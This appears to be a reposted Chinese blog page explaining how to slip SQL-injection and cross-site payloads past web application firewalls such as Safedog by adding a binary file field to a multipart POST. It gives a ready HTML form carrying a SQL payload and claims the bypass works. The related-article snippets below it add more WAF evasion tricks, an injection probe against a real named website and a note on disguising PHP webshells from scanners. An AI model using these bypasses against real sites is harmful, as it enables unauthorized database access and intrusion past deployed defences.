轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

最新推荐文章于 2024-08-28 13:44:19 发布
最新推荐文章于 2024-08-28 13:44:19 发布
阅读量508 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php 数据库
原文链接:http://www.cnblogs.com/develop/p/3884872.html
本文介绍了一种通过提交包含二进制文件的multipart请求来绕过如安全狗等Web应用防火墙(WAF)的方法。具体操作是构建一个HTML表单,并通过POST方式发送带有特定构造的文件和参数的请求。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>yzmm - p2j.cn</title>
</head>
<body>
<form action="http://webshell.cc/index.php" method="POST" enctype="multipart/form-data">
File:<input type="file" name="file" /><br/>
ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
<input type="submit" value="提交" />
</form>
</body>
</html>

index.php:

 

<?php
echo "POST-ID:".$_POST['id']."<br/>GET-ID:".$_GET['id'];
?>

提交带二进制文件的请求:

成功绕过。

 

 

本站内容均为原创,转载请务必保留署名与链接!
轻松绕各种WAF的POST注入、跨站防御(比如安全狗):http://www.webshell.cc/4464.html

转载于:https://www.cnblogs.com/develop/p/3884872.html

WAF 规则绕过绕过终极指南:从 SQL 注入到高级编码技术(3.21 更新)
浩策盾悟
01-27 1万+
测试最新版本的WAF可以完美绕过。这个需要mysql版本大于5.00.00。/*|%23--%23|*/ 注释符号 *|%23--%23|* 干扰符号。在mysql中这个不是注释,而是取消注释的内容。这个方法也可以部分绕过最新版本的WAF。/包含关键词进行绕过。用一些特殊字符代替空格,特殊字符拼接绕过waf。Mysql 内置得方法。Waf触发规则的绕过
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 4143
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
网络安全渗透测试之绕过网站安全狗
09-05
网络安全渗透测试之绕过网站安全狗,通过简单明了的方法绕过安装有安全狗的Web网站服务器进行渗透攻击,仅供参考
如何绕过安全狗
weixin_34085658的博客
09-17 233
http://www.jb51.net/hack/192036.html   一、前言     安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下面为大家一一介绍。 二、测试环境    本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql...
绕过web防火墙
s595674548的专栏
10-25 2365
今天去面试一个渗透测试岗位,其中有一题“”绕过waf的方法“”,说实在本人虽然是信息安全专业,但是做母校专业鼻祖,真不敢恭维母校的教学质量。后来本人出来做了软件开发,可以说软件开发几乎是自学,成不成才真不好说,懂一点点皮毛,混口饭吃;后来想转到安全,去面试几家安全类岗位,好几个都以我没工作经验为由拒绝我,其实也有我能力不是很突出的问题,本人懂的东西很广,但是都不怎么深入,竟然连绕过防火墙这样的问题
全方位绕过安全狗
weixin_34341117的博客
07-06 283
一、前言     安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下面为大家一一介绍。 二、测试环境     本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网站安全狗IIS版3.2.08417 三、SQL注入...
vBulletin系统曝SQL注入漏洞 安全狗可直接防御
weixin_33734785的博客
09-01 444
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL 注入WAF 绕过
最新发布
2301_77160226的博客
08-28 1673
SQL 注入攻击是一种严重的安全威胁,而 WAF 是防范 SQL 注入攻击的重要手段之一。然而,攻击者也在不断寻找方法来绕过 WAF,从而成功实施 SQL 注入攻击。为了防范 WAF 绕过,我们需要采取持续更新 WAF 规则、多层面防御、安全培训和定期安全审计等措施,形成一个强大的安全防护体系,保护 Web 应用程序的安全。同时,我们也需要不断关注网络安全领域的最新动态,及时了解新的攻击技术和防范方法,以提高我们的安全防护能力。
SQL注入WAF小结
05-08
### SQL注入WAF小结 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过向Web应用程序提交恶意SQL语句来获取敏感数据、修改数据或执行其他非法操作。随着网络安全技术的发展,Web应用防火墙...
WAF相关知识及安全狗的部署和绕过
北冥同学的成长记录笔记
07-16 4663
WAF即Web应用程序防火墙通过过滤和监视Web应用程序与Internet之间的HTTP通信来帮助保护Web应用程序,Web Application Firewall (WEB 应用防护系统)
第三篇:Bypass ngx_lua_waf SQL注入防御(多姿势)1
08-03
本文将探讨三种绕过ngx_lua_waf SQL注入防御的方法,旨在提高读者对安全防御机制的理解,并促进网络安全领域的进一步研究。 #### 0x01 环境搭建与测试准备 为了深入理解并验证绕过方法的有效性,首先需要搭建一个...
网防G01网站卫士版说明文档
10-30
网防G01,是专门针对互联网网站及服务器等关键信息基础资源进行综合防护的产品,由公安部第一研究所和计算机病毒防治技术国家工程实验室(北京)研发。
WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等...
djph26741的博客
09-20 230
核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF。 Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等。 转载于:https://www.cnblogs.com/bonelee/p/7560760.html...
360网站卫士SQL注入绕过案例一个
weixin_30911809的博客
01-23 429
不要以为用了360就可以高枕无忧,直接在netcraft的site_report中找到源站服务器IP,直接SQL脱裤,甚至可获取服务器权限。 存在漏洞的网站: 手工测试存在注入点: 但是网站有360保护,没法脱裤,必须想办法绕过: 360网站卫士都是劫持域名进行流量清洗,但是如果源站服务器防护的不好可能存在绕过。于是在网上搜索,终于在netcraft上找到: 源...
轻松bypass360网站卫士WAFSQL注入防护
h4ck0ne的博客
01-23 3370
随便网上找了一个网站,只是测试一下,没有干非法的事情! code 区域 http://www.py-guanyun.com/CompHonorBig.asp?id=49  code 区域 http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1 被拦截 换一个姿势看看: code 区域 http://www.py-g
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 3488
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
24 WEB漏洞-文件上传之WAF绕过及安全修复_阿里云盾waf绕过怎么修复
Python_0011的博客
02-15 1309
我这个测试是没有必要的,这只是说大家以后碰到同类的防护软件,不管是安全狗还是宝塔,安全公司里面的产品,那么大家在研究的时候,也是这么个研究方法,大家不要自己绕过绕过了,我们学的是研究的方法后期只要脑瓜子灵活一点,是没有任何问题是可以绕过的,方法学不到,那讲了也是白讲,我希望大家学的是绕过的方法,以后自己就能做这个事情。.php,它的意义是很明显的,因为安全狗也是程序,当它碰到截断,也是会截断的,后面的.php就没有匹配到,最后上传的后缀是.php就行了。这是垃圾数据的一个典型情况,末尾是要加;
6款好用免费的网络安全工具合集!
A_991128a的博客
10-12 877
从事网络安全相关工作,我们不仅要具备扎实的技术积累和实战项目经验,好用的网络安全工具也是不能少的,它在工作中可起到关键性作用。本文为大家推荐免费开源的网络安全工具,快来了解一下吧。Kali linux是一个基于Debian的Linux发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali实现了这个目标。大多数做安全测试的开源工具都被囊括在内。这个工具上手并不难,因此他是很多入门网络安全的新人的最佳选择。
绕过ngx_lua_waf SQL注入防御的策略分析
"本文介绍了如何绕过ngx_lua_waf的SQL注入防御策略,主要涉及ngx_lua_waf的基础知识、环境搭建、以及WAF测试方法。ngx_lua_waf是一款基于ngx_lua的Web应用防火墙,文章中提到的核心防御规则是针对SQL注入的。作者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值